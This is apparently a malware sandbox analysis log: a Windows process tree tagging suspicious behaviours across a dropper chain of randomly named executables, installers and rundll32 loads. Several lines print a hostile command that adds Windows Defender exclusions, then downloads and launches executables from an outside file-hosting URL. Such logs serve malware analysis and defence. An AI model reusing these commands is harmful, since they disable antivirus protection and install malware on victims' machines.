C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Suspicious use of SendNotifyMessage
PID:8896 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
- Suspicious use of SendNotifyMessage
PID:8288 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
- Suspicious use of SendNotifyMessage
PID:8256 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵PID:7520
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
PID:8380 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
- Suspicious use of SendNotifyMessage
PID:8668 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵PID:6452
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
- Suspicious use of SendNotifyMessage
PID:7888 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵PID:8544
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
- Suspicious use of SendNotifyMessage
PID:7900 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
PID:8012 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of SendNotifyMessage
PID:7764 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe28⤵PID:7828
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping GFBFPSXA -n 309⤵
- Runs ping.exe
PID:2532
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2072 -
C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe"C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe"6⤵PID:5908
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit7⤵PID:7904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'8⤵PID:3804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵PID:7372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵PID:5252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'8⤵PID:8360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')8⤵PID:4792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')8⤵PID:7636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')8⤵PID:8392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'8⤵
- Blocklisted process makes network request
PID:8600 -
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵PID:6728
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit10⤵PID:3308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'11⤵PID:8540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'11⤵PID:8080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'11⤵
- Modifies registry class
PID:8384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'11⤵PID:896
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'8⤵
- Suspicious use of SendNotifyMessage
PID:4264 -
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"9⤵
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: SetClipboardViewer
PID:6024
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'8⤵PID:6348
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"9⤵
- Suspicious use of SetThreadContext
PID:7020 -
C:\Users\Admin\AppData\Local\Temp\launcher.exe"{path}"10⤵PID:2608
-
-
-
-
-
-
C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe"C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe"6⤵PID:6980
-
-
C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe"C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe"6⤵
- Suspicious use of SetThreadContext
PID:4872 -
C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exeC:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe7⤵PID:7084
-
-
-
C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe"C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7064
-
-
C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe"C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe"6⤵PID:7128
-
-
C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"6⤵PID:4932
-
C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe" -q7⤵PID:2456
-
-
-
C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe"C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe"6⤵PID:7032
-
C:\Users\Admin\AppData\Roaming\2584156.exe"C:\Users\Admin\AppData\Roaming\2584156.exe"7⤵PID:8056
-
-
C:\Users\Admin\AppData\Roaming\5515754.exe"C:\Users\Admin\AppData\Roaming\5515754.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:6892
-
-
C:\Users\Admin\AppData\Roaming\3230219.exe"C:\Users\Admin\AppData\Roaming\3230219.exe"7⤵PID:5964
-
-
-
C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe"C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe"6⤵PID:6092
-
-
C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe"C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe"6⤵
- Suspicious use of SetThreadContext
PID:5604 -
C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exeC:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe7⤵PID:7792
-
-
-
C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe"C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe"6⤵PID:6392
-
-
C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe"C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe"6⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2460
-
-
C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"6⤵PID:6532
-
C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"7⤵
- Modifies data under HKEY_USERS
PID:300
-
-
-
C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe"C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe"6⤵PID:6672
-
-
C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe"C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6468
-
-
C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe"C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe"6⤵PID:6248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 6687⤵
- Program crash
PID:7264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 6527⤵
- Program crash
PID:7660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 6807⤵
- Program crash
PID:7960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 6367⤵
- Program crash
PID:8088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 11287⤵
- Program crash
PID:7436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 10767⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5864
-
-
-
C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe"C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe"6⤵
- Suspicious use of SetThreadContext
PID:5368 -
C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exeC:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe7⤵PID:7724
-
-
-
C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe"C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe"6⤵PID:5780
-
-
C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe"C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7252
-
-
C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe"C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe"6⤵
- Suspicious use of SetThreadContext
PID:7244 -
C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exeC:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe7⤵PID:5548
-
-
C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exeC:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe7⤵PID:5820
-
-
-
C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe"C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7236
-
-
C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe"C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe"6⤵PID:7228
-
-
C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"6⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\is-5QRTQ.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp"C:\Users\Admin\AppData\Local\Temp\is-5QRTQ.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp" /SL5="$402DE,138429,56832,C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:7492 -
C:\Users\Admin\AppData\Local\Temp\is-MH328.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MH328.tmp\Setup.exe" /Verysilent8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5420 -
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:8484 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
- Executes dropped EXE
PID:5636
-
-
-
-
-
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3936 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
PID:5340
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5128 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5148
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:7672 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 028F6052A2FE8BC8C915EF71D623C722 C2⤵
- Loads dropped DLL
PID:5868
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EC92D0FE9FD9F6C81FC82B7F1C1F2A45 C2⤵
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
PID:6312
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E1B3CB1C65ADCF600ADC47B52EDD9692 C2⤵
- Loads dropped DLL
PID:6808
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B982EE1D12FC5573F3D061FDE4B3E4C62⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4240
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:5276 -
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default3⤵
- Loads dropped DLL
- Adds Run key to start application
PID:9124 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"4⤵
- Checks computer location settings
PID:5268 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffa8d3c9ec0,0x7ffa8d3c9ed0,0x7ffa8d3c9ee05⤵PID:8372
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=2132 /prefetch:85⤵PID:4700
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=1772 /prefetch:85⤵PID:9172
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1696 /prefetch:25⤵PID:8928
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2616 /prefetch:15⤵
- Checks computer location settings
PID:8832
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2204 /prefetch:25⤵PID:4224
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=2200 /prefetch:85⤵PID:2276
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3420 /prefetch:85⤵PID:8392
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3280 /prefetch:85⤵
- Suspicious use of SendNotifyMessage
PID:7520
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3344 /prefetch:85⤵PID:8028
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3412 /prefetch:85⤵PID:8812
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D327.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
PID:2320
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7756 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5580
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8736 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6948
-
-
C:\Users\Admin\AppData\Local\Temp\CE4F.exeC:\Users\Admin\AppData\Local\Temp\CE4F.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8868
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6788
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8672
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6724 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
PID:6452
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:8204 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{75031801-02a9-6e4f-9ca6-98660627b607}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:9088
-
-
